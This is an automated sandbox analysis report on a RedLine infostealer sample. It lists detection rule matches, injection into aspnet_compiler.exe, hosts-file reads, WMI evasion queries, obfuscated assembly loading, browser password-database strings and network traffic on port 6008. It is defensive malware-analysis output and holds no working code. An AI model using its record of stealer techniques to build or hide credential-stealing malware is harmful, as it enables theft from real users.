                    Source: 0.2.StZAEFSb2j.exe.42f9000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.StZAEFSb2j.exe.42f9000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: StZAEFSb2j.exe PID: 780, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: aspnet_compiler.exe PID: 1592, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.StZAEFSb2j.exe.42f9000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.StZAEFSb2j.exe.42f9000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 1.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 1.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.StZAEFSb2j.exe.42f9000.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.StZAEFSb2j.exe.42f9000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: StZAEFSb2j.exe PID: 780, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: aspnet_compiler.exe PID: 1592, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeCode function: 0_2_00E446A8
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeCode function: 0_2_00E40448
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeCode function: 0_2_00E419D0
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeCode function: 0_2_00E47321
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeCode function: 0_2_00E45129
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeCode function: 0_2_00E48108
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeCode function: 0_2_00E40439
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeCode function: 0_2_00E419C1
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeCode function: 0_2_00E43F60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_02E2DE10
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_02E2D2F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0620E7D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_06206400
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_062015A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0620DF00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_06201AB8
                    Source: StZAEFSb2j.exe, 00000000.00000002.322189785.0000000005000000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBLACKDEVIL.dll6 vs StZAEFSb2j.exe
                    Source: StZAEFSb2j.exe, 00000000.00000002.322199547.0000000005010000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs StZAEFSb2j.exe
                    Source: StZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs StZAEFSb2j.exe
                    Source: StZAEFSb2j.exe, 00000000.00000002.321430350.0000000002C56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs StZAEFSb2j.exe
                    Source: StZAEFSb2j.exe, 00000000.00000002.321430350.0000000002C56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs StZAEFSb2j.exe
                    Source: StZAEFSb2j.exe, 00000000.00000002.321290507.0000000002C1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBLACKDEVIL.dll6 vs StZAEFSb2j.exe
                    Source: StZAEFSb2j.exe, 00000000.00000002.321290507.0000000002C1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs StZAEFSb2j.exe
                    Source: StZAEFSb2j.exe, 00000000.00000000.307650279.00000000005D2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXCBVNDDJD.exe4 vs StZAEFSb2j.exe
                    Source: StZAEFSb2j.exe, 00000000.00000002.321384668.0000000002C4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs StZAEFSb2j.exe
                    Source: StZAEFSb2j.exe, 00000000.00000002.321334213.0000000002C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs StZAEFSb2j.exe
                    Source: StZAEFSb2j.exeBinary or memory string: OriginalFilenameXCBVNDDJD.exe4 vs StZAEFSb2j.exe
                    Source: StZAEFSb2j.exeReversingLabs: Detection: 34%
                    Source: StZAEFSb2j.exeVirustotal: Detection: 25%
                    Source: StZAEFSb2j.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\StZAEFSb2j.exe C:\Users\user\Desktop\StZAEFSb2j.exe
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\StZAEFSb2j.exe.logJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile created: C:\Users\user\AppData\Local\Temp\tmpA487.tmpJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/26@3/2
                    Source: tmpA487.tmp.1.dr, tmpE406.tmp.1.dr, tmpCF62.tmp.1.dr, tmpE3D6.tmp.1.dr, tmpE3B6.tmp.1.dr, tmpA4F5.tmp.1.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: StZAEFSb2j.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6120:120:WilError_01
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: StZAEFSb2j.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: StZAEFSb2j.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: StZAEFSb2j.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BLACKDEVIL.pdbBSJB source: StZAEFSb2j.exe, 00000000.00000002.322189785.0000000005000000.00000004.08000000.00040000.00000000.sdmp, StZAEFSb2j.exe, 00000000.00000002.321290507.0000000002C1B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BLACKDEVIL.pdb source: StZAEFSb2j.exe, 00000000.00000002.322189785.0000000005000000.00000004.08000000.00040000.00000000.sdmp, StZAEFSb2j.exe, 00000000.00000002.321290507.0000000002C1B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: XCBVNDDJD.pdb source: StZAEFSb2j.exe

                    Data Obfuscation

                    barindex
                    Source: StZAEFSb2j.exe, u206e????????????????????????????????????????.cs.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.0.StZAEFSb2j.exe.5d0000.0.unpack, u206e????????????????????????????????????????.cs.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_06208010 push es; ret

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 6008
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6008 -> 49697
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6008 -> 49697
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 6008
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6008 -> 49697
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6008 -> 49697
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 6008
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6008 -> 49699
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6008 -> 49699
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 6008
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6008 -> 49700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6008 -> 49700
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exe TID: 5504Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exe TID: 1236Thread sleep time: -922337203685477s >= -30000s
